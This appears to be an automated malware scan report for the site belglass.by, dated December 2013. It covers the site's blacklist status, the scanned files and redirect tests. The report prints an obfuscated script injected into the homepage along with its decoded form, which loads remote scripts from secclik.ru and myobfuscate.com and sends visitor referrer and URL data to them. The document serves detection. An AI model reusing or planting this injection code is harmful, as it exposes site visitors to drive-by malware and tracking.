Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belglass.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://belglass.by/ | 200 OK Content-Length: 33007 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: secclik.ru var _110='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSSJ9EKkxWaoNEZuVGcwFmLPBTSKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPBTSgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cukUSPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASSJ9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJ2EDM3Q0MlQWaGNTJwhGcuIXZsRmb ...[978 bytes skipped]... Decoded script: var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.ru/handler.php%3Fid%3D7016%22%3E%3C/script%3E';var OII = document.createElement('script'); OII.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var I0O = document.getElementsByTagName('head')[0]; I0O.appendChild(OII);document.write(unescape(_escape)); var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.r ...[360 bytes skipped]... | ||
http://belglass.by/templates/belglass/css/scripts.js | 200 OK Content-Length: 56 Content-Type: application/x-javascript | clean |
http://secclik.ru/handler.php?id=7016 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://secclik.ru/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://belglass.by/engine/ajax/menu.js | 200 OK Content-Length: 3368 Content-Type: application/x-javascript | clean |
http://belglass.by/engine/ajax/dle_ajax.js | 200 OK Content-Length: 4725 Content-Type: application/x-javascript | clean |
http://belglass.by/engine/ajax/js_edit.js | 200 OK Content-Length: 6627 Content-Type: application/x-javascript | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belglass.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 16 Dec 2013 11:52:28 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 16 Dec 2013 04:52:28 GMT
Set-Cookie: PHPSESSID=e273eeea9acdc7533c7243ae13065618; path=/
X-Powered-By: PHP/4.4.9
GET / HTTP/1.1
Host: belglass.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 16 Dec 2013 11:52:28 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 16 Dec 2013 04:52:28 GMT
Set-Cookie: PHPSESSID=e273eeea9acdc7533c7243ae13065618; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: belglass.by
Referer: http://www.google.com/search?q=belglass.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: belglass.by
Referer: http://www.google.com/search?q=belglass.by
Result:
The result is similar to the first query. There are no suspicious redirects found.